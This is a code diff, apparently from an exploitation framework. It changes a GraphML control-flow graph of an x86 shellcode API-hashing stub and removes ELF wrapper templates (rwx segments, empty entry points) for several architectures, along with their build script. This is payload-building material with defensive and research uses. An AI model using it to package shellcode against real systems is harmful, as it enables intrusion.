-        <edge source="block.0x104c:instruction.0x104c" target="block.0x104c:instruction.0x1050"/>
-        <edge source="block.0x104c:instruction.0x104c" target="block.0x104c:instruction.0x104d"/>
-        <edge source="block.0x104c:instruction.0x104d" target="block.0x104c:instruction.0x1050"/>
+        <edge source="block.0x1049:instruction.0x1049" target="block.0x1049:instruction.0x104d"/>
+        <edge source="block.0x1049:instruction.0x1049" target="block.0x1049:instruction.0x104a"/>
+        <edge source="block.0x1049:instruction.0x104a" target="block.0x1049:instruction.0x104d"/>
      </graph>
    </node>
-    <node id="block.0x1055">
-      <data key="address">0x1055</data>
+    <node id="block.0x1051">
+      <data key="address">0x1051</data>
      <data key="type">block</data>
      <graph edgedefault="directed">
-        <data key="address">0x1055</data>
+        <data key="address">0x1051</data>
        <data key="type">block</data>
-        <node id="block.0x1055:instruction.0x1055">
-          <data key="address">0x1055</data>
+        <node id="block.0x1051:instruction.0x1051">
+          <data key="address">0x1051</data>
          <data key="type">instruction</data>
          <data key="instruction.hex">31c0</data>
          <data key="instruction.source">xor eax, eax</data>
        </node>
-        <node id="block.0x1055:instruction.0x1057">
-          <data key="address">0x1057</data>
+        <node id="block.0x1051:instruction.0x1053">
+          <data key="address">0x1053</data>
          <data key="type">instruction</data>
          <data key="instruction.hex">ac</data>
          <data key="instruction.source">lodsb al, byte ptr [esi]</data>
        </node>
-        <node id="block.0x1055:instruction.0x1058">
-          <data key="address">0x1058</data>
+        <node id="block.0x1051:instruction.0x1054">
+          <data key="address">0x1054</data>
          <data key="type">instruction</data>
          <data key="instruction.hex">c1cf0d</data>
          <data key="instruction.source">ror edi, 0xd</data>
        </node>
-        <node id="block.0x1055:instruction.0x105b">
-          <data key="address">0x105b</data>
+        <node id="block.0x1051:instruction.0x1057">
+          <data key="address">0x1057</data>
          <data key="type">instruction</data>
          <data key="instruction.hex">01c7</data>
          <data key="instruction.source">add edi, eax</data>
        </node>
-        <node id="block.0x1055:instruction.0x105d">
-          <data key="address">0x105d</data>
+        <node id="block.0x1051:instruction.0x1059">
+          <data key="address">0x1059</data>
          <data key="type">instruction</data>
          <data key="instruction.hex">38e0</data>
          <data key="instruction.source">cmp al, ah</data>
        </node>
-        <node id="block.0x1055:instruction.0x105f">
-          <data key="address">0x105f</data>
+        <node id="block.0x1051:instruction.0x105b">
+          <data key="address">0x105b</data>
          <data key="type">instruction</data>
          <data key="instruction.hex">75f4</data>
-          <data key="instruction.source">jne 0x1055</data>
+          <data key="instruction.source">jne 0x1051</data>
        </node>
-        <edge source="block.0x1055:instruction.0x1055" target="block.0x1055:instruction.0x1057"/>
-        <edge source="block.0x1055:instruction.0x1055" target="block.0x1055:instruction.0x1058"/>
-        <edge source="block.0x1055:instruction.0x1055" target="block.0x1055:instruction.0x105d"/>
-        <edge source="block.0x1055:instruction.0x1057" target="block.0x1055:instruction.0x105b"/>
-        <edge source="block.0x1055:instruction.0x1057" target="block.0x1055:instruction.0x105d"/>
-        <edge source="block.0x1055:instruction.0x1058" target="block.0x1055:instruction.0x105b"/>
-        <edge source="block.0x1055:instruction.0x105b" target="block.0x1055:instruction.0x105d"/>
-        <edge source="block.0x1055:instruction.0x105d" target="block.0x1055:instruction.0x105f"/>
+        <edge source="block.0x1051:instruction.0x1051" target="block.0x1051:instruction.0x1053"/>
+        <edge source="block.0x1051:instruction.0x1051" target="block.0x1051:instruction.0x1054"/>
+        <edge source="block.0x1051:instruction.0x1051" target="block.0x1051:instruction.0x1059"/>
+        <edge source="block.0x1051:instruction.0x1053" target="block.0x1051:instruction.0x1057"/>
+        <edge source="block.0x1051:instruction.0x1053" target="block.0x1051:instruction.0x1059"/>
+        <edge source="block.0x1051:instruction.0x1054" target="block.0x1051:instruction.0x1057"/>
+        <edge source="block.0x1051:instruction.0x1057" target="block.0x1051:instruction.0x1059"/>
+        <edge source="block.0x1051:instruction.0x1059" target="block.0x1051:instruction.0x105b"/>
      </graph>
    </node>
-    <node id="block.0x1061">
-      <data key="address">0x1061</data>
+    <node id="block.0x105d">
+      <data key="address">0x105d</data>
      <data key="type">block</data>
      <graph edgedefault="directed">
-        <data key="address">0x1061</data>
+        <data key="address">0x105d</data>
        <data key="type">block</data>
-        <node id="block.0x1061:instruction.0x1061">
-          <data key="address">0x1061</data>
+        <node id="block.0x105d:instruction.0x105d">
+          <data key="address">0x105d</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">037df8</data>
+          <data key="instruction.source">add edi, dword ptr [ebp - 8]</data>
+        </node>
+        <node id="block.0x105d:instruction.0x1060">
+          <data key="address">0x1060</data>
          <data key="type">instruction</data>
          <data key="instruction.hex">3b7d24</data>
          <data key="instruction.source">cmp edi, dword ptr [ebp + 0x24]</data>
        </node>
-        <node id="block.0x1061:instruction.0x1064">
-          <data key="address">0x1064</data>
+        <node id="block.0x105d:instruction.0x1063">
+          <data key="address">0x1063</data>
          <data key="type">instruction</data>
-          <data key="instruction.hex">75e2</data>
-          <data key="instruction.source">jne 0x1048</data>
+          <data key="instruction.hex">75e0</data>
+          <data key="instruction.source">jne 0x1045</data>
        </node>
-        <edge source="block.0x1061:instruction.0x1061" target="block.0x1061:instruction.0x1064"/>
+        <edge source="block.0x105d:instruction.0x105d" target="block.0x105d:instruction.0x1060"/>
+        <edge source="block.0x105d:instruction.0x1060" target="block.0x105d:instruction.0x1063"/>
      </graph>
    </node>
-    <node id="block.0x1066">
-      <data key="address">0x1066</data>
+    <node id="block.0x1065">
+      <data key="address">0x1065</data>
      <data key="type">block</data>
      <graph edgedefault="directed">
-        <data key="address">0x1066</data>
+        <data key="address">0x1065</data>
        <data key="type">block</data>
-        <node id="block.0x1066:instruction.0x1066">
-          <data key="address">0x1066</data>
+        <node id="block.0x1065:instruction.0x1065">
+          <data key="address">0x1065</data>
          <data key="type">instruction</data>
          <data key="instruction.hex">58</data>
          <data key="instruction.source">pop eax</data>
        </node>
-        <node id="block.0x1066:instruction.0x1067">
-          <data key="address">0x1067</data>
+        <node id="block.0x1065:instruction.0x1066">
+          <data key="address">0x1066</data>
          <data key="type">instruction</data>
          <data key="instruction.hex">8b5824</data>
          <data key="instruction.source">mov ebx, dword ptr [eax + 0x24]</data>
        </node>
-        <node id="block.0x1066:instruction.0x106a">
-          <data key="address">0x106a</data>
+        <node id="block.0x1065:instruction.0x1069">
+          <data key="address">0x1069</data>
          <data key="type">instruction</data>
          <data key="instruction.hex">01d3</data>
          <data key="instruction.source">add ebx, edx</data>
        </node>
-        <node id="block.0x1066:instruction.0x106c">
-          <data key="address">0x106c</data>
+        <node id="block.0x1065:instruction.0x106b">
+          <data key="address">0x106b</data>
          <data key="type">instruction</data>
          <data key="instruction.hex">668b0c4b</data>
          <data key="instruction.source">mov cx, word ptr [ebx + ecx*2]</data>
        </node>
-        <node id="block.0x1066:instruction.0x1070">
-          <data key="address">0x1070</data>
+        <node id="block.0x1065:instruction.0x106f">
+          <data key="address">0x106f</data>
          <data key="type">instruction</data>
          <data key="instruction.hex">8b581c</data>
          <data key="instruction.source">mov ebx, dword ptr [eax + 0x1c]</data>
        </node>
-        <node id="block.0x1066:instruction.0x1073">
-          <data key="address">0x1073</data>
+        <node id="block.0x1065:instruction.0x1072">
+          <data key="address">0x1072</data>
          <data key="type">instruction</data>
          <data key="instruction.hex">01d3</data>
          <data key="instruction.source">add ebx, edx</data>
        </node>
-        <node id="block.0x1066:instruction.0x1075">
-          <data key="address">0x1075</data>
+        <node id="block.0x1065:instruction.0x1074">
+          <data key="address">0x1074</data>
          <data key="type">instruction</data>
          <data key="instruction.hex">8b048b</data>
          <data key="instruction.source">mov eax, dword ptr [ebx + ecx*4]</data>
        </node>
-        <node id="block.0x1066:instruction.0x1078">
-          <data key="address">0x1078</data>
+        <node id="block.0x1065:instruction.0x1077">
+          <data key="address">0x1077</data>
          <data key="type">instruction</data>
          <data key="instruction.hex">01d0</data>
          <data key="instruction.source">add eax, edx</data>
        </node>
-        <node id="block.0x1066:instruction.0x107a">
-          <data key="address">0x107a</data>
+        <node id="block.0x1065:instruction.0x1079">
+          <data key="address">0x1079</data>
          <data key="type">instruction</data>
          <data key="instruction.hex">89442424</data>
          <data key="instruction.source">mov dword ptr [esp + 0x24], eax</data>
        </node>
-        <node id="block.0x1066:instruction.0x107e">
+        <node id="block.0x1065:instruction.0x107d">
+          <data key="address">0x107d</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">5b</data>
+          <data key="instruction.source">pop ebx</data>
+        </node>
+        <node id="block.0x1065:instruction.0x107e">
          <data key="address">0x107e</data>
          <data key="type">instruction</data>
          <data key="instruction.hex">5b</data>
          <data key="instruction.source">pop ebx</data>
        </node>
-        <node id="block.0x1066:instruction.0x107f">
+        <node id="block.0x1065:instruction.0x107f">
          <data key="address">0x107f</data>
          <data key="type">instruction</data>
-          <data key="instruction.hex">5b</data>
-          <data key="instruction.source">pop ebx</data>
-        </node>
-        <node id="block.0x1066:instruction.0x1080">
-          <data key="address">0x1080</data>
-          <data key="type">instruction</data>
          <data key="instruction.hex">61</data>
          <data key="instruction.source">popal</data>
        </node>
-        <node id="block.0x1066:instruction.0x1081">
-          <data key="address">0x1081</data>
+        <node id="block.0x1065:instruction.0x1080">
+          <data key="address">0x1080</data>
          <data key="type">instruction</data>
          <data key="instruction.hex">59</data>
          <data key="instruction.source">pop ecx</data>
        </node>
-        <node id="block.0x1066:instruction.0x1082">
-          <data key="address">0x1082</data>
+        <node id="block.0x1065:instruction.0x1081">
+          <data key="address">0x1081</data>
          <data key="type">instruction</data>
          <data key="instruction.hex">5a</data>
          <data key="instruction.source">pop edx</data>
        </node>
-        <node id="block.0x1066:instruction.0x1083">
-          <data key="address">0x1083</data>
+        <node id="block.0x1065:instruction.0x1082">
+          <data key="address">0x1082</data>
          <data key="type">instruction</data>
          <data key="instruction.hex">51</data>
          <data key="instruction.source">push ecx</data>
        </node>
-        <node id="block.0x1066:instruction.0x1084">
-          <data key="address">0x1084</data>
+        <node id="block.0x1065:instruction.0x1083">
+          <data key="address">0x1083</data>
          <data key="type">instruction</data>
          <data key="instruction.hex">ffe0</data>
          <data key="instruction.source">jmp eax</data>
        </node>
-        <edge source="block.0x1066:instruction.0x1066" target="block.0x1066:instruction.0x107e"/>
-        <edge source="block.0x1066:instruction.0x1066" target="block.0x1066:instruction.0x1067"/>
-        <edge source="block.0x1066:instruction.0x1066" target="block.0x1066:instruction.0x1070"/>
-        <edge source="block.0x1066:instruction.0x1066" target="block.0x1066:instruction.0x107a"/>
-        <edge source="block.0x1066:instruction.0x1067" target="block.0x1066:instruction.0x1075"/>
-        <edge source="block.0x1066:instruction.0x1067" target="block.0x1066:instruction.0x106a"/>
-        <edge source="block.0x1066:instruction.0x106a" target="block.0x1066:instruction.0x1070"/>
-        <edge source="block.0x1066:instruction.0x106a" target="block.0x1066:instruction.0x1080"/>
-        <edge source="block.0x1066:instruction.0x106a" target="block.0x1066:instruction.0x106c"/>
-        <edge source="block.0x1066:instruction.0x106c" target="block.0x1066:instruction.0x1075"/>
-        <edge source="block.0x1066:instruction.0x106c" target="block.0x1066:instruction.0x1070"/>
-        <edge source="block.0x1066:instruction.0x106c" target="block.0x1066:instruction.0x1080"/>
-        <edge source="block.0x1066:instruction.0x1070" target="block.0x1066:instruction.0x1075"/>
-        <edge source="block.0x1066:instruction.0x1070" target="block.0x1066:instruction.0x1073"/>
-        <edge source="block.0x1066:instruction.0x1073" target="block.0x1066:instruction.0x107e"/>
-        <edge source="block.0x1066:instruction.0x1073" target="block.0x1066:instruction.0x1075"/>
-        <edge source="block.0x1066:instruction.0x1073" target="block.0x1066:instruction.0x1080"/>
-        <edge source="block.0x1066:instruction.0x1075" target="block.0x1066:instruction.0x107e"/>
-        <edge source="block.0x1066:instruction.0x1075" target="block.0x1066:instruction.0x1080"/>
-        <edge source="block.0x1066:instruction.0x1075" target="block.0x1066:instruction.0x1078"/>
-        <edge source="block.0x1066:instruction.0x1078" target="block.0x1066:instruction.0x1080"/>
-        <edge source="block.0x1066:instruction.0x1078" target="block.0x1066:instruction.0x107a"/>
-        <edge source="block.0x1066:instruction.0x107a" target="block.0x1066:instruction.0x107e"/>
-        <edge source="block.0x1066:instruction.0x107a" target="block.0x1066:instruction.0x1080"/>
-        <edge source="block.0x1066:instruction.0x107e" target="block.0x1066:instruction.0x107f"/>
-        <edge source="block.0x1066:instruction.0x107f" target="block.0x1066:instruction.0x1080"/>
-        <edge source="block.0x1066:instruction.0x1080" target="block.0x1066:instruction.0x1081"/>
-        <edge source="block.0x1066:instruction.0x1080" target="block.0x1066:instruction.0x1084"/>
-        <edge source="block.0x1066:instruction.0x1081" target="block.0x1066:instruction.0x1082"/>
-        <edge source="block.0x1066:instruction.0x1081" target="block.0x1066:instruction.0x1083"/>
-        <edge source="block.0x1066:instruction.0x1082" target="block.0x1066:instruction.0x1083"/>
-        <edge source="block.0x1066:instruction.0x1083" target="block.0x1066:instruction.0x1084"/>
+        <edge source="block.0x1065:instruction.0x1065" target="block.0x1065:instruction.0x107d"/>
+        <edge source="block.0x1065:instruction.0x1065" target="block.0x1065:instruction.0x1066"/>
+        <edge source="block.0x1065:instruction.0x1065" target="block.0x1065:instruction.0x106f"/>
+        <edge source="block.0x1065:instruction.0x1065" target="block.0x1065:instruction.0x1079"/>
+        <edge source="block.0x1065:instruction.0x1066" target="block.0x1065:instruction.0x1074"/>
+        <edge source="block.0x1065:instruction.0x1066" target="block.0x1065:instruction.0x1069"/>
+        <edge source="block.0x1065:instruction.0x1069" target="block.0x1065:instruction.0x106f"/>
+        <edge source="block.0x1065:instruction.0x1069" target="block.0x1065:instruction.0x107f"/>
+        <edge source="block.0x1065:instruction.0x1069" target="block.0x1065:instruction.0x106b"/>
+        <edge source="block.0x1065:instruction.0x106b" target="block.0x1065:instruction.0x1074"/>
+        <edge source="block.0x1065:instruction.0x106b" target="block.0x1065:instruction.0x106f"/>
+        <edge source="block.0x1065:instruction.0x106b" target="block.0x1065:instruction.0x107f"/>
+        <edge source="block.0x1065:instruction.0x106f" target="block.0x1065:instruction.0x1074"/>
+        <edge source="block.0x1065:instruction.0x106f" target="block.0x1065:instruction.0x1072"/>
+        <edge source="block.0x1065:instruction.0x1072" target="block.0x1065:instruction.0x107d"/>
+        <edge source="block.0x1065:instruction.0x1072" target="block.0x1065:instruction.0x1074"/>
+        <edge source="block.0x1065:instruction.0x1072" target="block.0x1065:instruction.0x107f"/>
+        <edge source="block.0x1065:instruction.0x1074" target="block.0x1065:instruction.0x107d"/>
+        <edge source="block.0x1065:instruction.0x1074" target="block.0x1065:instruction.0x107f"/>
+        <edge source="block.0x1065:instruction.0x1074" target="block.0x1065:instruction.0x1077"/>
+        <edge source="block.0x1065:instruction.0x1077" target="block.0x1065:instruction.0x107f"/>
+        <edge source="block.0x1065:instruction.0x1077" target="block.0x1065:instruction.0x1079"/>
+        <edge source="block.0x1065:instruction.0x1079" target="block.0x1065:instruction.0x107d"/>
+        <edge source="block.0x1065:instruction.0x1079" target="block.0x1065:instruction.0x107f"/>
+        <edge source="block.0x1065:instruction.0x107d" target="block.0x1065:instruction.0x107e"/>
+        <edge source="block.0x1065:instruction.0x107e" target="block.0x1065:instruction.0x107f"/>
+        <edge source="block.0x1065:instruction.0x107f" target="block.0x1065:instruction.0x1080"/>
+        <edge source="block.0x1065:instruction.0x107f" target="block.0x1065:instruction.0x1083"/>
+        <edge source="block.0x1065:instruction.0x1080" target="block.0x1065:instruction.0x1081"/>
+        <edge source="block.0x1065:instruction.0x1080" target="block.0x1065:instruction.0x1082"/>
+        <edge source="block.0x1065:instruction.0x1081" target="block.0x1065:instruction.0x1082"/>
+        <edge source="block.0x1065:instruction.0x1082" target="block.0x1065:instruction.0x1083"/>
+      </graph>
+    </node>
+    <node id="block.0x1085">
+      <data key="address">0x1085</data>
+      <data key="type">block</data>
+      <graph edgedefault="directed">
+        <data key="address">0x1085</data>
+        <data key="type">block</data>
+        <node id="block.0x1085:instruction.0x1085">
+          <data key="address">0x1085</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">58</data>
+          <data key="instruction.source">pop eax</data>
+        </node>
      </graph>
    </node>
    <node id="block.0x1086">
@@ -545,58 +566,44 @@
        <node id="block.0x1086:instruction.0x1086">
          <data key="address">0x1086</data>
          <data key="type">instruction</data>
-          <data key="instruction.hex">58</data>
-          <data key="instruction.source">pop eax</data>
-        </node>
-      </graph>
-    </node>
-    <node id="block.0x1087">
-      <data key="address">0x1087</data>
-      <data key="type">block</data>
-      <graph edgedefault="directed">
-        <data key="address">0x1087</data>
-        <data key="type">block</data>
-        <node id="block.0x1087:instruction.0x1087">
-          <data key="address">0x1087</data>
-          <data key="type">instruction</data>
          <data key="instruction.hex">5f</data>
          <data key="instruction.source">pop edi</data>
        </node>
-        <node id="block.0x1087:instruction.0x1088">
-          <data key="address">0x1088</data>
+        <node id="block.0x1086:instruction.0x1087">
+          <data key="address">0x1087</data>
          <data key="type">instruction</data>
          <data key="instruction.hex">5a</data>
          <data key="instruction.source">pop edx</data>
        </node>
-        <node id="block.0x1087:instruction.0x1089">
-          <data key="address">0x1089</data>
+        <node id="block.0x1086:instruction.0x1088">
+          <data key="address">0x1088</data>
          <data key="type">instruction</data>
          <data key="instruction.hex">8b12</data>
          <data key="instruction.source">mov edx, dword ptr [edx]</data>
        </node>
-        <node id="block.0x1087:instruction.0x108b">
-          <data key="address">0x108b</data>
+        <node id="block.0x1086:instruction.0x108a">
+          <data key="address">0x108a</data>
          <data key="type">instruction</data>
-          <data key="instruction.hex">eb82</data>
+          <data key="instruction.hex">eb83</data>
          <data key="instruction.source">jmp 0x100f</data>
        </node>
-        <edge source="block.0x1087:instruction.0x1087" target="block.0x1087:instruction.0x1088"/>
-        <edge source="block.0x1087:instruction.0x1088" target="block.0x1087:instruction.0x1089"/>
-        <edge source="block.0x1087:instruction.0x1089" target="block.0x1087:instruction.0x108b"/>
+        <edge source="block.0x1086:instruction.0x1086" target="block.0x1086:instruction.0x1087"/>
+        <edge source="block.0x1086:instruction.0x1087" target="block.0x1086:instruction.0x1088"/>
+        <edge source="block.0x1086:instruction.0x1088" target="block.0x1086:instruction.0x108a"/>
      </graph>
    </node>
    <edge source="block.0x1000" target="block.0x100f"/>
-    <edge source="block.0x100f" target="block.0x101b"/>
-    <edge source="block.0x101b" target="block.0x1022"/>
-    <edge source="block.0x1022" target="block.0x1024"/>
-    <edge source="block.0x1024" target="block.0x102c"/>
-    <edge source="block.0x102c" target="block.0x103d"/>
-    <edge source="block.0x103d" target="block.0x1048"/>
-    <edge source="block.0x1048" target="block.0x104c"/>
-    <edge source="block.0x104c" target="block.0x1055"/>
-    <edge source="block.0x1055" target="block.0x1061"/>
-    <edge source="block.0x1061" target="block.0x1066"/>
-    <edge source="block.0x1066" target="block.0x1086"/>
-    <edge source="block.0x1086" target="block.0x1087"/>
+    <edge source="block.0x100f" target="block.0x1018"/>
+    <edge source="block.0x1018" target="block.0x101f"/>
+    <edge source="block.0x101f" target="block.0x1021"/>
+    <edge source="block.0x1021" target="block.0x1029"/>
+    <edge source="block.0x1029" target="block.0x103a"/>
+    <edge source="block.0x103a" target="block.0x1045"/>
+    <edge source="block.0x1045" target="block.0x1049"/>
+    <edge source="block.0x1049" target="block.0x1051"/>
+    <edge source="block.0x1051" target="block.0x105d"/>
+    <edge source="block.0x105d" target="block.0x1065"/>
+    <edge source="block.0x1065" target="block.0x1085"/>
+    <edge source="block.0x1085" target="block.0x1086"/>
  </graph>
 </graphml>
@@ -88,7 +88,5 @@ strtab:
 db 0
 db 0
 strtabsz equ $ - strtab
-
-align 4
 global _start
 _start:
@@ -1,99 +0,0 @@
-; build with:
-;   nasm elf_dll_loongarch64_template.s -f bin -o template_loongarch64_linux_dll.bin
-
-BITS 64
-
-org     0
-
-ehdr:                            ; Elf64_Ehdr
-  db    0x7F, "ELF", 2, 1, 1, 0  ;   e_ident
-  db    0, 0, 0, 0,  0, 0, 0, 0  ;
-  dw    3                        ;   e_type       = ET_DYN
-  dw    0x102                    ;   e_machine    = LOONGARCH
-  dd    1                        ;   e_version
-  dq    _start                   ;   e_entry
-  dq    phdr - $$                ;   e_phoff
-  dq    shdr - $$                ;   e_shoff
-  dd    0                        ;   e_flags
-  dw    ehdrsize                 ;   e_ehsize
-  dw    phdrsize                 ;   e_phentsize
-  dw    2                        ;   e_phnum
-  dw    shentsize                ;   e_shentsize
-  dw    2                        ;   e_shnum
-  dw    1                        ;   e_shstrndx
-
-ehdrsize equ  $ - ehdr
-
-phdr:                            ; Elf32_Phdr
-  dd    1                        ;   p_type       = PT_LOAD
-  dd    7                        ;   p_flags      = rwx
-  dq    0                        ;   p_offset
-  dq    $$                       ;   p_vaddr
-  dq    $$                       ;   p_paddr
-  dq    0xDEADBEEF               ;   p_filesz
-  dq    0xDEADBEEF               ;   p_memsz
-  dq    0x1000                   ;   p_align
-
-phdrsize equ  $ - phdr
-  dd    2                          ; p_type  = PT_DYNAMIC
-  dd    7                          ; p_flags = rwx
-  dq    dynsection                 ; p_offset
-  dq    dynsection                 ; p_vaddr
-  dq    dynsection                 ; p_vaddr
-  dq    dynsz                      ; p_filesz
-  dq    dynsz                      ; p_memsz
-  dq    0x1000                     ; p_align
-
-shdr:
-  dd    1                          ; sh_name
-  dd    6                          ; sh_type = SHT_DYNAMIC
-  dq    0                          ; sh_flags
-  dq    dynsection                 ; sh_addr
-  dq    dynsection                 ; sh_offset
-  dq    dynsz                      ; sh_size
-  dd    0                          ; sh_link
-  dd    0                          ; sh_info
-  dq    8                          ; sh_addralign
-  dq    7                          ; sh_entsize
-shentsize equ $ - shdr
-  dd    0                          ; sh_name
-  dd    3                          ; sh_type = SHT_STRTAB
-  dq    0                          ; sh_flags
-  dq    strtab                     ; sh_addr
-  dq    strtab                     ; sh_offset
-  dq    strtabsz                   ; sh_size
-  dd    0                          ; sh_link
-  dd    0                          ; sh_info
-  dq    0                          ; sh_addralign
-  dq    0                          ; sh_entsize
-
-dynsection:
-; DT_INIT
-  dq    0x0c
-  dq    _start
-; DT_STRTAB
-  dq    0x05
-  dq    strtab
-; DT_SYMTAB
-  dq    0x06
-  dq    strtab
-; DT_STRSZ
-  dq    0x0a
-  dq    0
-; DT_SYMENT
-  dq    0x0b
-  dq    0
-; DT_NULL
-  dq    0x00
-  dq    0
-
-dynsz equ $ - dynsection
-
-strtab:
-  db 0
-  db 0
-strtabsz equ $ - strtab
-
-align 16
-global _start
-_start:
@@ -94,6 +94,5 @@ strtab:
 db 0
 strtabsz equ $ - strtab

-align 4
 global _start
 _start:
@@ -1,8 +0,0 @@
-#!/bin/sh
-
-dst_folder="../../../"
-for file in $(find ./ -name "*.s")
-do
-   arch=`echo $file | cut -d "_" -f2`;
-   nasm -f bin $file -o $dst_folder"template_"$arch"_linux.bin"
- done
@@ -1,6 +1,7 @@
 ; build with:
 ;   nasm elf_aarch64_template.s -f bin -o template_aarch64_linux.bin

+
 BITS 64
 org     0x400000
 ehdr:                            ; Elf32_Ehdr
@@ -1,37 +0,0 @@
-; build with:
-;   nasm elf_armbe_template.s -f bin -o template_armbe_linux.bin
-
-BITS 32
-ehdr:                            ; Elf32_Ehdr
-  db    0x7F, "ELF", 1, 2, 1, 0  ;   e_ident
-  db    0, 0, 0, 0,  0, 0, 0, 0  ;
-  dw    0x0200                   ;   e_type       = ET_EXEC for an executable
-  dw    0x2800                   ;   e_machine    = ARM
-  dd    0x01000000               ;   e_version
-  dd    0x54800000               ;   e_entry
-  dd    0x34000000               ;   e_phoff
-  dd    0                        ;   e_shoff
-  dd    0                        ;   e_flags
-  dw    0x3400                   ;   e_ehsize
-  dw    0x2000                   ;   e_phentsize
-  dw    0x0100                   ;   e_phnum
-  dw    0                        ;   e_shentsize
-  dw    0                        ;   e_shnum
-  dw    0                        ;   e_shstrndx
-
-ehdrsize equ  $ - ehdr
-
-phdr:                            ; Elf32_Phdr
-
-  dd    0x01000000               ;   p_type       = pt_load
-  dd    0                        ;   p_offset
-  dd    0x00800000               ;   p_vaddr
-  dd    0x00800000               ;   p_paddr
-  dd    0xefbeadde               ;   p_filesz
-  dd    0xefbeadde               ;   p_memsz
-  dd    0x07000000               ;   p_flags      = rwx
-  dd    0x00100000               ;   p_align
-
-phdrsize equ  $ - phdr
-
-_start:
@@ -1,42 +0,0 @@
-; build with:
-;   nasm elf_loongarch64_template.s -f bin -o template_loongarch64_linux.bin
-
-BITS 64
-
-org     0x80400000
-
-ehdr:                            ; Elf32_Ehdr
-  db    0x7F, "ELF", 2, 1, 1, 0  ;   e_ident
-  db    0, 0, 0, 0,  0, 0, 0, 0  ;
-  dw    2                        ;   e_type       = ET_EXEC for an executable
-  dw    0x102                    ;   e_machine    = LOONGARCH
-  dd    1                        ;   e_version
-  dq    _start                   ;   e_entry
-  dq    phdr - $$                ;   e_phoff
-  dq    0                        ;   e_shoff
-  dd    0                        ;   e_flags
-  dw    ehdrsize                 ;   e_ehsize
-  dw    phdrsize                 ;   e_phentsize
-  dw    1                        ;   e_phnum
-  dw    0                        ;   e_shentsize
-  dw    0                        ;   e_shnum
-  dw    0                        ;   e_shstrndx
-
-ehdrsize equ  $ - ehdr
-
-phdr:                            ; Elf32_Phdr
-  dd    1                        ;   p_type       = PT_LOAD
-  dd    7                        ;   p_flags      = rwx
-  dq    0                        ;   p_offset
-  dq    $$                       ;   p_vaddr
-  dq    $$                       ;   p_paddr
-  dq    0xDEADBEEF               ;   p_filesz
-  dq    0xDEADBEEF               ;   p_memsz
-  dq    0x1000                   ;   p_align
-
-phdrsize equ  $ - phdr
-
-global _start
-
-_start:
-
@@ -1,55 +0,0 @@
-; build with:
-;   nasm elf_mips64_template.s -f bin -o template_mips64_linux.bin
-
-%define WORD_BE(value) (((value & 0xFF) << 8) | ((value >> 8) & 0xFF))
-%define DWORD_BE(dword) (((dword & 0xFF) << 24) | \
-                        ((dword & 0xFF00) << 8) | \
-                        ((dword >> 8) & 0xFF00) | \
-                        ((dword >> 24) & 0xFF))
-%define QWORD_BE(qword) ( \
-    ((qword & 0x00000000000000FF) << 56) | \
-    ((qword & 0x000000000000FF00) << 40) | \
-    ((qword & 0x0000000000FF0000) << 24) | \
-    ((qword & 0x00000000FF000000) << 8) | \
-    ((qword >> 8) & 0x000000FF00000000) | \
-    ((qword >> 24) & 0x0000FF0000000000) | \
-    ((qword >> 40) & 0x00FF000000000000) | \
-    ((qword >> 56) & 0xFF00000000000000) )
-
-BITS 64
-
-org     0x400000
-ehdr:                            ; Elf32_Ehdr
-  db    0x7F, "ELF", 2, 2, 1, 0  ;   e_ident
-  db    0, 0, 0, 0,  0, 0, 0, 0  ;
-  dw    WORD_BE(2)               ;   e_type       = ET_EXEC for an executable
-  dw    WORD_BE(0x08)            ;   e_machine    = MIPS
-  dd    0                        ;   e_version
-  dq    QWORD_BE(0x400078)       ;   e_entry
-  dq    QWORD_BE(0x40)           ;   e_phoff
-  dq    0                        ;   e_shoff
-  dd    0                        ;   e_flags
-  dw    WORD_BE(0x40)            ;   e_ehsize
-  dw    WORD_BE(0x38)            ;   e_phentsize
-  dw    WORD_BE(0x1)             ;   e_phnum
-  dw    0                        ;   e_shentsize
-  dw    0                        ;   e_shnum
-  dw    0                        ;   e_shstrndx
-
-ehdrsize equ  $ - ehdr
-
-phdr:                            ; Elf32_Phdr
-  dd    DWORD_BE(1)              ;   p_type       = PT_LOAD
-  dd    DWORD_BE(7)              ;   p_flags      = rwx
-  dq    0                        ;   p_offset
-  dq    QWORD_BE(0x400000)       ;   p_vaddr
-  dq    QWORD_BE(0x400000)       ;   p_paddr
-  dq    QWORD_BE(0xA00000)       ;   p_filesz
-  dq    QWORD_BE(0xA00000)       ;   p_memsz
-  dq    QWORD_BE(0x1000)         ;   p_align
-
-phdrsize equ  $ - phdr
-
-global _start
-
-_start:
@@ -1,40 +0,0 @@
-; build with:
-;   nasm elf_ppc64le_template.s -f bin -o template_ppc64le_linux.bin
-
-BITS 64
-
-org 0x400000
-
-ehdr:                            ; Elf32_Ehdr
-  db    0x7F, "ELF", 2, 1, 1, 0  ;   e_ident
-  db    0, 0, 0, 0,  0, 0, 0, 0  ;
-  dw    2                        ;   e_type       = ET_EXEC for an executable
-  dw    0x15                     ;   e_machine    = PPC64
-  dd    0                        ;   e_version
-  dq    _start                   ;   e_entry
-  dq    phdr - $$                ;   e_phoff
-  dq    0                        ;   e_shoff
-  dd    0                        ;   e_flags
-  dw    ehdrsize                 ;   e_ehsize
-  dw    phdrsize                 ;   e_phentsize
-  dw    1                        ;   e_phnum
-  dw    0                        ;   e_shentsize
-  dw    0                        ;   e_shnum
-  dw    0                        ;   e_shstrndx
-
-ehdrsize equ  $ - ehdr
-
-phdr:                            ; Elf32_Phdr
-  dd    1                        ;   p_type       = PT_LOAD
-  dd    7                        ;   p_flags      = rwx
-  dq    0                        ;   p_offset
-  dq    $$                       ;   p_vaddr
-  dq    $$                       ;   p_paddr
-  dq    0xDEADBEEF               ;   p_filesz
-  dq    0xDEADBEEF               ;   p_memsz
-  dq    0x1000                   ;   p_align
-
-phdrsize equ  $ - phdr
-
-_start:
-dq _start+0x8
@@ -1,37 +0,0 @@
-; build with:
-;   nasm elf_ppc_template.s -f bin -o template_ppc_linux.bin
-
-BITS 32
-ehdr:                            ; Elf32_Ehdr
-  db    0x7F, "ELF", 1, 2, 1, 0  ;   e_ident
-  db    0, 0, 0, 0,  0, 0, 0, 0  ;
-  dw    0x0200                   ;   e_type       = ET_EXEC for an executable
-  dw    0x1400                   ;   e_machine    = PPC
-  dd    0x01000000               ;   e_version
-  dd    0x54100000               ;   e_entry
-  dd    0x34000000               ;   e_phoff
-  dd    0                        ;   e_shoff
-  dd    0                        ;   e_flags
